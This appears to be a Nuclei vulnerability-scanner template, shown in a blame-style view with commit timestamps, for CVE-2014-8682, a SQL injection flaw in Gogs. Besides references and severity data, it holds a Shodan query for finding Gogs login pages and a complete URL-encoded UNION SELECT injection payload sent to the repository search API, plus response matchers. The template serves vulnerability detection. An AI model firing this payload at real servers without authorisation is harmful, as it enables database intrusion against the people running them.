2021-11-20 11:54:58 +00:00
id : CVE-2014-8682
info :
2022-04-29 19:58:07 +00:00
name : Gogs (Go Git Service) - SQL Injection
2022-04-17 06:30:44 +00:00
author : dhiyaneshDK,daffainfo
2021-11-20 11:54:58 +00:00
severity : high
2021-11-21 09:23:15 +00:00
description : Multiple SQL injection vulnerabilities in Gogs (aka Go Git Service) 0.3.1-9 through 0.5.x before 0.5.6.1105 Beta allow remote attackers to execute arbitrary SQL commands via the q parameter to (1) api/v1/repos/search, which is not properly handled in models/repo.go, or (2) api/v1/users/search, which is not properly handled in models/user.go.
2021-11-20 11:56:31 +00:00
reference :
2022-02-25 22:07:55 +00:00
- https://nvd.nist.gov/vuln/detail/CVE-2014-8682
2021-11-20 11:56:31 +00:00
- http://seclists.org/fulldisclosure/2014/Nov/33
- http://packetstormsecurity.com/files/129117/Gogs-Repository-Search-SQL-Injection.html
- https://github.com/gogits/gogs/commit/0c5ba4573aecc9eaed669e9431a70a5d9f184b8d
2022-05-17 09:18:12 +00:00
- https://www.exploit-db.com/exploits/35238
2021-11-20 11:56:31 +00:00
- https://exchange.xforce.ibmcloud.com/vulnerabilities/98694
2022-02-01 21:52:18 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
2022-05-17 09:18:12 +00:00
cvss-score : 10
2022-02-01 21:52:18 +00:00
cve-id : CVE-2014-8682
cwe-id : CWE-89
2021-11-21 09:23:15 +00:00
metadata :
2022-04-22 10:38:41 +00:00
shodan-query : title:"Sign In - Gogs"
tags : cve,cve2014,sqli,gogs
2021-11-20 11:54:58 +00:00
requests :
- method : GET
path :
- '{{BaseURL}}/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27'
matchers-condition : and
matchers :
- type : word
2022-04-17 06:30:44 +00:00
part : body
2021-11-20 11:54:58 +00:00
words :
- '"ok":true'
- '"data"'
2022-04-17 06:30:44 +00:00
- '"repolink":"'
2021-11-27 18:38:05 +00:00
condition : and
2021-11-21 09:23:15 +00:00
2021-11-20 11:54:58 +00:00
- type : status
status :
- 200
2022-02-01 18:09:32 +00:00
2022-04-29 19:58:07 +00:00
# Enhanced by mp on 2022/04/26